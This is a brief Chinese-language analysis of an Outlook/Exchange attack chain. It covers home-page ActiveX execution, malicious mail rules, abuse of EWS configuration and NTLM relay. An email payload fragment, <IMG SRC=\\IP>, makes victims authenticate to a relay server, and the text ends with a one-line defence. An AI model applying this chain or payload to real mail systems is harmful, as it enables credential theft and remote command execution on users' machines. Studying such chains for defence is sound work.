Outlook滥用利用链分析

	一、Outlook主页滥用 OUTLOOK可以设置主页样式，如下图为收件夹的主页样式 只要打开OUTLOOK就会立即执行。最主要的是可以该主页可以调用outlook的内部IE浏览器 Outlook的内部IE浏览器可以执ACTIVEX，从而执行可执行程序。最骚的是即使在outlook设 置中禁用了ACTIVEX，也不影响内部IE浏览器的ACTIVEX。 如：a.html,创建一个wscript.shell，执行notepad。代码详情见 https://sensepost.com/blog/2017/outlook-home-pag e-another-ruler-vector/ 只要重新启动OUTLOOK即可直接执行。 二、OUTLOOK的规则滥用（远程唤起） 主页滥用每次重启OUTLOOK都会执行恶意脚本 这样在某些特殊情况下可能会动静太大 这里利用outlook的规则制定，打开管理规则和通知 点击新建规则。 新建空白规则，点击下一步 通过自己的需求，设置制定规则 如收到包含fuck为主题的邮件就弹出计算器。 通过这样就可以远程唤醒恶意脚本了。 三、exchange ews Exchange ews接口支持NTLM认证 从而进行收发件 配置邮箱等操作。当然也可以配置上文的主页和规则 这样我们只要拿到NTLM凭证就可以操控本地用户的outlook的配置，从而执行恶意程序。 四、NTLM中继 要想快速拿到NTLM凭证 最快的方式就是dump密码和hash中继。既然outlook存在低 版本的内置ie浏览器这边选hash中继。 五、域内用户相互信任机制 在域内内部组织成员互相发送邮件是能够加载JS的 只要在邮件正文插入JS 如<IMG SRC=\\I P(NTLM中继地址)>这样倒叙往上推就可以拿下任何人的当前权限了。 从步骤5,4,3,2/1就可以形成攻击链了 1.用户触发XSS 向中继服务器进行认证 2.中继服务器劫持认证 并通过exchange ews接口更改本地配置 3.EWS发送同步指令 更新本地用户OUTLOOK配置，从而命令执行 防御策略：关闭不必要的API接口并更新最新补丁。